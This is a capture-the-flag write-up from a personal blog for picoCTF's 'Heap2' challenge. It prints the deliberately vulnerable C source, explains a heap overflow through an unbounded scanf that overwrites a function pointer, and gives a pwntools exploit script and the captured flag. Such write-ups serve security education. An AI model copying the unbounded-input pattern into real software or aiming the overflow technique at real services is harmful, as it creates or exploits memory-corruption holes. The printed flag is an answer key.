<!DOCTYPE html>
<html lang="en-us">

<head><script src="/livereload.js?mindelay=10&amp;v=2&amp;port=1313&amp;path=livereload" data-no-instant defer></script>
    <title>
Heap2 | 0x3nigma
</title>

    <meta http-equiv="content-type" content="text/html; charset=utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta name="description" content="Your website description">

<meta name="generator" content="Hugo 0.151.0">


<link rel="canonical" href="http://localhost:1313/posts/picoctf_heap2/" >




<link href="/css/style.min.66302fa6c122ab7804faa4bd6465554ac4d746c25294af622826d0445b79ab94.css" rel="stylesheet">




</head>

<body>

    <div class="flexWrapper">
        <header class="headerWrapper">
    <div class="header">
        <div>
            <a class="terminal" href="/">
                <span>0x3nigma@localhost ~ $</span>
            </a>
        </div>
        <input class="side-menu" type="checkbox" id="side-menu">
        <label class="hamb" for="side-menu"><span class="hamb-line"></span></label>
        <nav class="headerLinks">
            <ul>
                
                <li>
                    <a href="http://localhost:1313/posts/" title="" >
                        ~/posts</a>
                </li>
                
                <li>
                    <a href="http://localhost:1313/about/" title="" >
                        ~/about</a>
                </li>
                
                <li>
                    <a href="http://localhost:1313/categories/" title="" >
                        ~/categories</a>
                </li>
                
            </ul>
        </nav>
    </div>
</header>


        <div class="content">
            <main class="main">
                
<div class="postWrapper">
    <h1>Heap2</h1>
    

    
    
    
    

    
    
    
    
    

    
    
    
    
    

    
    
    
    

    
    
    
    

    
    
    
    

    
    <section class="postMetadata">
        <dl>
            
            
            
            
                <dt>published</dt>
                 
                 
                 <dd><time datetime="2025-12-20">2025-12-20</time></dd>
            
            
                <dt>reading time</dt>
                <dd>3 minutes</dd>
            
        </dl>
    </section>
    
    <div>
        <h3 id="analysis">Analysis:</h3>
<p>Checking the protections on the binary:</p>
<p><img src="/Images/checksec_heap2.png" alt="alt"></p>
<p>From the above result we can see that this is a 64 bit binary with no stack canary and no PIE. But since the challenge is named as heap2 I don&rsquo;t think there will be much to do with the stack.</p>
<p>Now looking at the source code:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-c" data-lang="c"><span style="display:flex;"><span><span style="color:#75715e">#include</span> <span style="color:#75715e">&lt;stdio.h&gt;</span><span style="color:#75715e">
</span></span></span><span style="display:flex;"><span><span style="color:#75715e">#include</span> <span style="color:#75715e">&lt;stdlib.h&gt;</span><span style="color:#75715e">
</span></span></span><span style="display:flex;"><span><span style="color:#75715e">#include</span> <span style="color:#75715e">&lt;string.h&gt;</span><span style="color:#75715e">
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span>
</span></span><span style="display:flex;"><span><span style="color:#75715e">#define FLAGSIZE_MAX 64
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">int</span> num_allocs;
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">char</span> <span style="color:#f92672">*</span>x;
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">char</span> <span style="color:#f92672">*</span>input_data;
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">void</span> <span style="color:#a6e22e">win</span>() {
</span></span><span style="display:flex;"><span>    <span style="color:#75715e">// Print flag
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span>    <span style="color:#66d9ef">char</span> buf[FLAGSIZE_MAX];
</span></span><span style="display:flex;"><span>    FILE <span style="color:#f92672">*</span>fd <span style="color:#f92672">=</span> <span style="color:#a6e22e">fopen</span>(<span style="color:#e6db74">&#34;flag.txt&#34;</span>, <span style="color:#e6db74">&#34;r&#34;</span>);
</span></span><span style="display:flex;"><span>    <span style="color:#a6e22e">fgets</span>(buf, FLAGSIZE_MAX, fd);
</span></span><span style="display:flex;"><span>    <span style="color:#a6e22e">printf</span>(<span style="color:#e6db74">&#34;%s</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74">&#34;</span>, buf);
</span></span><span style="display:flex;"><span>    <span style="color:#a6e22e">fflush</span>(stdout);
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>    <span style="color:#a6e22e">exit</span>(<span style="color:#ae81ff">0</span>);
</span></span><span style="display:flex;"><span>}
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">void</span> <span style="color:#a6e22e">check_win</span>() { 
</span></span><span style="display:flex;"><span>	((<span style="color:#66d9ef">void</span> (<span style="color:#f92672">*</span>)())<span style="color:#f92672">*</span>(<span style="color:#66d9ef">int</span><span style="color:#f92672">*</span>)x)();
</span></span><span style="display:flex;"><span>}
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">void</span> <span style="color:#a6e22e">print_menu</span>() {
</span></span><span style="display:flex;"><span>    <span style="color:#a6e22e">printf</span>(<span style="color:#e6db74">&#34;</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74">1. Print Heap</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74">2. Write to buffer</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74">3. Print x</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74">4. Print Flag</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74">5. &#34;</span>
</span></span><span style="display:flex;"><span>           <span style="color:#e6db74">&#34;Exit</span><span style="color:#ae81ff">\n\n</span><span style="color:#e6db74">Enter your choice: &#34;</span>);
</span></span><span style="display:flex;"><span>    <span style="color:#a6e22e">fflush</span>(stdout);
</span></span><span style="display:flex;"><span>}
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">void</span> <span style="color:#a6e22e">init</span>() {
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>    <span style="color:#a6e22e">printf</span>(<span style="color:#e6db74">&#34;</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74">I have a function, I sometimes like to call it, maybe you should change it</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74">&#34;</span>);
</span></span><span style="display:flex;"><span>    <span style="color:#a6e22e">fflush</span>(stdout);
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>    input_data <span style="color:#f92672">=</span> <span style="color:#a6e22e">malloc</span>(<span style="color:#ae81ff">5</span>);
</span></span><span style="display:flex;"><span>    <span style="color:#a6e22e">strncpy</span>(input_data, <span style="color:#e6db74">&#34;pico&#34;</span>, <span style="color:#ae81ff">5</span>);
</span></span><span style="display:flex;"><span>    x <span style="color:#f92672">=</span> <span style="color:#a6e22e">malloc</span>(<span style="color:#ae81ff">5</span>);
</span></span><span style="display:flex;"><span>    <span style="color:#a6e22e">strncpy</span>(x, <span style="color:#e6db74">&#34;bico&#34;</span>, <span style="color:#ae81ff">5</span>);
</span></span><span style="display:flex;"><span>}
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">void</span> <span style="color:#a6e22e">write_buffer</span>() {
</span></span><span style="display:flex;"><span>    <span style="color:#a6e22e">printf</span>(<span style="color:#e6db74">&#34;Data for buffer: &#34;</span>);
</span></span><span style="display:flex;"><span>    <span style="color:#a6e22e">fflush</span>(stdout);
</span></span><span style="display:flex;"><span>    <span style="color:#a6e22e">scanf</span>(<span style="color:#e6db74">&#34;%s&#34;</span>, input_data);
</span></span><span style="display:flex;"><span>}
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">void</span> <span style="color:#a6e22e">print_heap</span>() {
</span></span><span style="display:flex;"><span>    <span style="color:#a6e22e">printf</span>(<span style="color:#e6db74">&#34;[*]   Address   -&gt;   Value   </span><span style="color:#ae81ff">\n</span><span style="color:#e6db74">&#34;</span>);
</span></span><span style="display:flex;"><span>    <span style="color:#a6e22e">printf</span>(<span style="color:#e6db74">&#34;+-------------+-----------+</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74">&#34;</span>);
</span></span><span style="display:flex;"><span>    <span style="color:#a6e22e">printf</span>(<span style="color:#e6db74">&#34;[*]   %p  -&gt;   %s</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74">&#34;</span>, input_data, input_data);
</span></span><span style="display:flex;"><span>    <span style="color:#a6e22e">printf</span>(<span style="color:#e6db74">&#34;+-------------+-----------+</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74">&#34;</span>);
</span></span><span style="display:flex;"><span>    <span style="color:#a6e22e">printf</span>(<span style="color:#e6db74">&#34;[*]   %p  -&gt;   %s</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74">&#34;</span>, x, x);
</span></span><span style="display:flex;"><span>    <span style="color:#a6e22e">fflush</span>(stdout);
</span></span><span style="display:flex;"><span>}
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">int</span> <span style="color:#a6e22e">main</span>(<span style="color:#66d9ef">void</span>) {
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>    <span style="color:#75715e">// Setup
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span>    <span style="color:#a6e22e">init</span>();
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">int</span> choice;
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">while</span> (<span style="color:#ae81ff">1</span>) {
</span></span><span style="display:flex;"><span>        <span style="color:#a6e22e">print_menu</span>();
</span></span><span style="display:flex;"><span>	<span style="color:#66d9ef">if</span> (<span style="color:#a6e22e">scanf</span>(<span style="color:#e6db74">&#34;%d&#34;</span>, <span style="color:#f92672">&amp;</span>choice) <span style="color:#f92672">!=</span> <span style="color:#ae81ff">1</span>) <span style="color:#a6e22e">exit</span>(<span style="color:#ae81ff">0</span>);
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>        <span style="color:#66d9ef">switch</span> (choice) {
</span></span><span style="display:flex;"><span>        <span style="color:#66d9ef">case</span> <span style="color:#ae81ff">1</span><span style="color:#f92672">:</span>
</span></span><span style="display:flex;"><span>            <span style="color:#75715e">// print heap
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span>            <span style="color:#a6e22e">print_heap</span>();
</span></span><span style="display:flex;"><span>            <span style="color:#66d9ef">break</span>;
</span></span><span style="display:flex;"><span>        <span style="color:#66d9ef">case</span> <span style="color:#ae81ff">2</span><span style="color:#f92672">:</span>
</span></span><span style="display:flex;"><span>            <span style="color:#a6e22e">write_buffer</span>();
</span></span><span style="display:flex;"><span>            <span style="color:#66d9ef">break</span>;
</span></span><span style="display:flex;"><span>        <span style="color:#66d9ef">case</span> <span style="color:#ae81ff">3</span><span style="color:#f92672">:</span>
</span></span><span style="display:flex;"><span>            <span style="color:#75715e">// print x
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span>            <span style="color:#a6e22e">printf</span>(<span style="color:#e6db74">&#34;</span><span style="color:#ae81ff">\n\n</span><span style="color:#e6db74">x = %s</span><span style="color:#ae81ff">\n\n</span><span style="color:#e6db74">&#34;</span>, x);
</span></span><span style="display:flex;"><span>            <span style="color:#a6e22e">fflush</span>(stdout);
</span></span><span style="display:flex;"><span>            <span style="color:#66d9ef">break</span>;
</span></span><span style="display:flex;"><span>        <span style="color:#66d9ef">case</span> <span style="color:#ae81ff">4</span><span style="color:#f92672">:</span>
</span></span><span style="display:flex;"><span>            <span style="color:#75715e">// Check for win condition
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span>            <span style="color:#a6e22e">check_win</span>();
</span></span><span style="display:flex;"><span>            <span style="color:#66d9ef">break</span>;
</span></span><span style="display:flex;"><span>        <span style="color:#66d9ef">case</span> <span style="color:#ae81ff">5</span><span style="color:#f92672">:</span>
</span></span><span style="display:flex;"><span>            <span style="color:#75715e">// exit
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span>            <span style="color:#66d9ef">return</span> <span style="color:#ae81ff">0</span>;
</span></span><span style="display:flex;"><span>        <span style="color:#66d9ef">default</span><span style="color:#f92672">:</span>
</span></span><span style="display:flex;"><span>            <span style="color:#a6e22e">printf</span>(<span style="color:#e6db74">&#34;Invalid choice</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74">&#34;</span>);
</span></span><span style="display:flex;"><span>            <span style="color:#a6e22e">fflush</span>(stdout);
</span></span><span style="display:flex;"><span>        }
</span></span><span style="display:flex;"><span>    }
</span></span><span style="display:flex;"><span>}
</span></span></code></pre></div><p>From the above code we can see that the <code>win</code> function prints the flag but there is no direct method of calling it.
However if we give a closer look at the <code>check_win()</code> function:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-c" data-lang="c"><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">void</span> <span style="color:#a6e22e">check_win</span>() { 
</span></span><span style="display:flex;"><span>	((<span style="color:#66d9ef">void</span> (<span style="color:#f92672">*</span>)())<span style="color:#f92672">*</span>(<span style="color:#66d9ef">int</span><span style="color:#f92672">*</span>)x)();
</span></span><span style="display:flex;"><span>}
</span></span></code></pre></div><p>We see that it is first typecasting x into an integer pointer and then it is retrieving the value at x and on x86-64, <code>int</code> is still 4 bytes, so only the lower 4 bytes of the pointer stored at x are read and then it is typecasting that into a function pointer and calling the function pointed by the function pointer.
So if we could anyhow write the address of the <code>win()</code> function at x , it will get called when calling the <code>check_win()</code> function.
However we must note that this is a 64 bit binary and the addresses are 8 byte addresses but the above is only retrieving 4 bytes.
To check if 4 bytes will be enough we run the following command :
<code>readelf -s chall | grep &quot;win&quot;</code></p>
<p>And we got this:
<code>38: 00000000004011a0    66 FUNC    GLOBAL DEFAULT   14 win</code></p>
<p>Hence we see that the address of <code>win</code> function is <code>0x00000000004011a0</code> which consists of only 3 non-zero bytes initially. Hence the 4 bytes will be enough.</p>
<p>Also we see in the <code>write_buffer()</code> function:
<code>scanf(&quot;%s&quot;, input_data); </code></p>
<p>This means we can send data of any length into <code>input_data</code>. Hence we will use this vulnerability to overwrite x.
`</p>
<p>Now we can write an exploit for this binary:</p>
<h3 id="exploitation">Exploitation:</h3>
<h4 id="steps">Steps:</h4>
<ol>
<li>
<p>First we have to find the distance between <code>input_data</code> and <code>x</code> so that we can overflow the <code>input_data</code> and overwrite <code>x</code>.
Running the program and printing the heap we get :</p>
<p><img src="/Images/dist_heap2.png" alt="alt"></p>
<p>Hence we can see that the dist between <code>input_data</code> and <code>x</code> is (0x18046d0 - 0x18046b0) that is 32 bytes.</p>
</li>
<li>
<p>Then we send the payload which will consist of 32 bytes of random data followed by the address of <code>win</code> function to overwrite  <code>x</code>.</p>
</li>
<li>
<p>Then we will call the <code>check_win()</code> function.</p>
</li>
</ol>
<p>Here is the exploit script:</p>
<h4 id="script">Script:</h4>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-python" data-lang="python"><span style="display:flex;"><span><span style="color:#f92672">from</span> pwn <span style="color:#f92672">import</span> <span style="color:#f92672">*</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">import</span> argparse
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>parser <span style="color:#f92672">=</span> argparse<span style="color:#f92672">.</span>ArgumentParser()
</span></span><span style="display:flex;"><span>parser<span style="color:#f92672">.</span>add_argument(<span style="color:#e6db74">&#34;host&#34;</span>, type<span style="color:#f92672">=</span>str)
</span></span><span style="display:flex;"><span>parser<span style="color:#f92672">.</span>add_argument(<span style="color:#e6db74">&#34;port&#34;</span>, type<span style="color:#f92672">=</span>int)
</span></span><span style="display:flex;"><span>args <span style="color:#f92672">=</span> parser<span style="color:#f92672">.</span>parse_args()
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>elf <span style="color:#f92672">=</span> ELF(<span style="color:#e6db74">&#34;./chall&#34;</span>)
</span></span><span style="display:flex;"><span>context<span style="color:#f92672">.</span>binary <span style="color:#f92672">=</span> elf
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>payload <span style="color:#f92672">=</span> flat(
</span></span><span style="display:flex;"><span>        <span style="color:#e6db74">b</span><span style="color:#e6db74">&#39;a&#39;</span> <span style="color:#f92672">*</span> <span style="color:#ae81ff">32</span>,
</span></span><span style="display:flex;"><span>        elf<span style="color:#f92672">.</span>symbols[<span style="color:#e6db74">&#39;win&#39;</span>]
</span></span><span style="display:flex;"><span>    )
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>p <span style="color:#f92672">=</span> remote(args<span style="color:#f92672">.</span>host, args<span style="color:#f92672">.</span>port)
</span></span><span style="display:flex;"><span>p<span style="color:#f92672">.</span>sendline(<span style="color:#e6db74">b</span><span style="color:#e6db74">&#39;2&#39;</span>)
</span></span><span style="display:flex;"><span>p<span style="color:#f92672">.</span>sendline(payload)
</span></span><span style="display:flex;"><span>p<span style="color:#f92672">.</span>sendline(<span style="color:#e6db74">b</span><span style="color:#e6db74">&#39;4&#39;</span>)
</span></span><span style="display:flex;"><span>p<span style="color:#f92672">.</span>interactive()
</span></span></code></pre></div><p>Running the script we get the following flag:</p>
<h4 id="flag">Flag:</h4>
<p><code>picoCTF{and_down_the_road_we_go_856288fc}</code></p>

    </div>
</div>

            </main>
        </div>


        <footer class="footer">
    
        <span>
            © 2025 0x3nigma, Built with
            <a href="https://gohugo.io" class="footerLink">Hugo</a> and
            <a href="https://github.com/LordMathis/hugo-theme-nightfall" class="footerLink">Nightfall</a> theme
        </span>
    
</footer>
    </div>

</body>

</html>
